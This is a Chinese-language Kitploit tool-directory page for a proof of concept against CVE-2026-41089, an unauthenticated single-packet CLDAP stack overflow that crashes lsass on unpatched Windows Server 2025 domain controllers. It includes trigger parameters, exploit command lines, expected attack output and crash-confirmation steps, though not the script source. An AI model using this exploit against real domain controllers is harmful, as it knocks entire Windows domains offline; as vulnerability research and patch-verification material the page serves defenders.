Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41089-PoC — CVE-2026-41089 LongLogon:针对未修补的 Windows Server 2025 Netlogon(lsass 0xc0000409)的预认证 CLDAP(UDP/389)栈缓冲区溢出崩溃工具。仅使用标准库的 Python PoC + 实验环境分析报告。 | Kitploit
工具/GitHubGitHub/1posix/cve-2026-41089-poc
漏洞分析漏洞利用网络安全渗透测试红队
GitHub1posix/cve-2026-41089-poc

CVE-2026-41089-PoC

CVE-2026-41089 LongLogon:针对未修补的 Windows Server 2025 Netlogon(lsass 0xc0000409)的预认证 CLDAP(UDP/389)栈缓冲区溢出崩溃工具。仅使用标准库的 Python PoC + 实验环境分析报告。

查看仓库
5天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41089 — LongLogon(崩溃 PoC)

Windows Server 2025 的 Netlogon 服务中存在预认证栈缓冲区溢出漏洞。来自网络上任意主机的一个 CLDAP 数据包(UDP/389)就足以触发:lsass.exe 以 STATUS_STACK_BUFFER_OVERRUN(0xc0000409)终止,域控制器随即重启。

  • 组件:netlogon.dll,NlGetLocalPingResponse / BuildSamLogonResponse
  • 向量:一个 UDP/389 数据包,无需认证
  • 影响:拒绝服务(lsass.exe 崩溃,DC 重启)
  • 修复版本:build 10.0.26100.32772 及更高版本

工作原理

对 Netlogon CLDAP ping 的响应会被序列化到一个 528 字节的栈缓冲区中。服务器会写入自身的名称(林、域、主机名),随后是攻击者可控的 User 字段(上限为 130 个宽字符)。当总填充量达到 536 字节(缓冲区 + 栈 cookie)时,末尾的 L'\0' 会覆盖 /GS cookie,导致进程崩溃。

NtVer 字段决定代码路径:0x02 走存在漏洞的 BuildSamLogonResponse,而 0x06 / 0x16 走有边界检查的(安全)BuildSamLogonResponseEx。本 PoC 发送 NtVer = 0x02。

要求

  • 未打补丁的 Windows Server 2025 DC:netlogon.dll < 10.0.26100.32772
  • 一个较长的 DNS 域,使预计填充量(User=130)达到 >= 536 字节。 Windows Server 2025 将 AD 域名限制为 64 个字符;配合 63 字符的主机名,实测填充量为 581 字节(必定崩溃)。较短的组合(例如 533 字节)则处于临界状态。
  • 攻击主机能够访问 UDP/389
  • Python >= 3.9(仅标准库,无依赖)

用法

python3 longlogon_exploit.py <dc-ip> <dc-dns-domain> [--dry-run] [--shots N] [--confirm-wait S] [--force]

--dry-run 使用 User=1(无害)进行探测,显示预计填充量,不发起攻击 --shots N 发送的溢出数据包数量(默认 1) --confirm-wait S 静默攻击后重新探测前的等待时间(默认 75 秒) --force 即使预计填充量低于 536 字节也发起攻击

示例(将 IP 和域名替换为你的实验环境值):

python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example --dry-run
python3 longlogon_exploit.py 192.168.1.10 cve202641089.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.example

发起攻击的预期输出:

[*] CVE-2026-41089 LongLogon crasher -> 192.168.1.10 (domain 64 chars)
[*] DC alive. Probe fill (User=1) = 323 B; projected fill (User=130) = 581 B (buffer 528, cookie 536)
[*] Firing overflow: NtVer=0x02, User=130 chars, shots=1
    shot #1: NO REPLY (5.01 s) -> possible crash (or lost packet)
[*] Waiting 75 s to let the DC (re)start, then re-probing...
[+] DC STILL DOWN after overflow + re-probe -> CRASH LIKELY (reboot in progress or dump pending)

退出码:0 可能崩溃,1 初始探测时 DC 无响应,2 填充量低于 536 字节(临界),3 DC 存活。

注意:脚本会在 75 秒后重新探测,因为单个静默数据包也可能是丢失的 UDP 数据报。不要仅凭静默就断定发生了崩溃。

前置条件检查(非破坏性)

使用研究仓库中的官方检查器。它以 User=1 进行探测,因此 DC 会保持运行:

git clone https://github.com/ADScanPro/CVE-2026-41089-LongLogon && cd CVE-2026-41089-LongLogon
python3 run longlogon.py <dc-ip> <dc-dns-domain>

预期结果:"PRECONDITION MET",且预计填充量至少为 536 字节。

该检查器并不能证明补丁状态:已打补丁的 DC 会走相同的代码路径,只是拒绝超长写入。请直接在 DC 上检查 netlogon.dll 版本(< 10.0.26100.32772 = 存在漏洞)。

崩溃后的确认

在 DC 上,待其恢复运行后:

(Get-CimInstance Win32_OperatingSystem).LastBootUpTime
Get-WinEvent -FilterHashtable @{LogName='Application'; Id=1000} -MaxEvents 5

查找事件 1000:出错应用程序 lsass.exe,出错模块 netlogon.DLL,异常代码 0xc0000409,且启动时间晚于攻击时间。

实验环境结果

在 Windows Server 2025、lsass.exe 10.0.26100.7309、netlogon.dll 10.0.26100.32230(未打补丁)、64 字符域名 + 63 字符主机名(预计填充量 581 字节)上测试。发送一个数据包:

    Application Error (Id 1000):
      Faulting application: lsass.exe, version: 10.0.26100.7309
      Faulting module:    netlogon.DLL, version: 10.0.26100.32230
      Exception code:     0xc0000409        (STATUS_STACK_BUFFER_OVERRUN)
      Fault offset:       0x000000000002399d

    LastBootUpTime: 17:19:42   (crash logged at 17:18:37)

说明

  • 默认情况下是拒绝服务,而非远程代码执行:/GS cookie 会在到达返回地址之前将溢出转化为受控崩溃。User 字段完全由攻击者控制,这在理论上是一条通往代码执行的路径。
  • 临界窗口:填充量在 528 到 535 字节之间时,崩溃并非必然(实验测量:535 字节 = 6/6 崩溃,534 字节 = 0/6)。
  • 崩溃是非幂等的:发起攻击前请对 DC 创建快照。
  • 崩溃后 DC 可能会以 Netlogon DBFlag 0x2080FFFF(修复模式)恢复,这在 lsass 崩溃后属于正常现象。

免责声明

本 PoC 仅供教育和研究目的提供。它是在 Windows Server 2025 的隔离实验环境中开发和测试的。使用风险自负。

使用本脚本即表示你同意,作者对任何数据丢失、服务中断、硬件损坏或其他直接或间接后果概不负责。崩溃是非幂等的:目标域控制器将会重启。发起攻击前请创建快照。

不保证本 PoC 在生产环境或所有 Windows Server 2025 版本上有效。

参考资料

  • 研究与检查器:https://github.com/ADScanPro/CVE-2026-41089-LongLogon
  • 技术文章:https://adscanpro.com/blog/patch-diffing-cve-2026-41089-netlogon
下载工具